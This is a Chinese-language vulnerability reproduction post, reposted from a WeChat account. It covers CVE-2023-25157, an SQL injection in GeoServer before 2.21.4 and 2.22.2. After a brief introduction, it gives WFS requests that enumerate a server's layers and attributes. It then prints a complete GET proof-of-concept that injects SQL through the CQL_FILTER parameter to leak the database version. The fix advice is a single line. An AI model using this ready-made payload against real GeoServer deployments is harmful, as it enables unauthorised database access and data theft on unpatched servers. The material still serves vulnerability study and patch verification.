【漏洞复现】GeoServer SQL注入漏洞(CVE-2023-25157)

admin
admin
admin
102620
文章
87
评论
2024年2月24日15:26:37评论50 views字数 872阅读2分54秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。
0X01 简介

GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。

官网:
https://geoserver.org/
漏洞编号:
CVE-2023-25157
影响范围:
GeoServer < 2.21.4
GeoServer < 2.22.2
复现环境:

GeoServer 2.22.1

0X02 漏洞复现
获取图层信息
http://192.168.245.134:8080/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities
【漏洞复现】GeoServer SQL注入漏洞(CVE-2023-25157)

获取图层属性

http://192.168.245.134:8080/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=ne:ceshi{图层名称}
【漏洞复现】GeoServer SQL注入漏洞(CVE-2023-25157)
POC:
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:ceshi{图层名称}&CQL_FILTER=strStartsWith(test{图层属性},%27x%27%27)+%3d+true+and+1%3d(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+%27)+%3d+true HTTP/1.1Host: 192.168.245.134:8080
【漏洞复现】GeoServer SQL注入漏洞(CVE-2023-25157)

0X03 修复建议

更新至最新版!

0X04

原文始发于微信公众号(皓月的笔记本):【漏洞复现】GeoServer SQL注入漏洞(CVE-2023-25157)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日15:26:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】GeoServer SQL注入漏洞(CVE-2023-25157)http://cn-sec.com/archives/2112177.html

发表评论

匿名网友 填写信息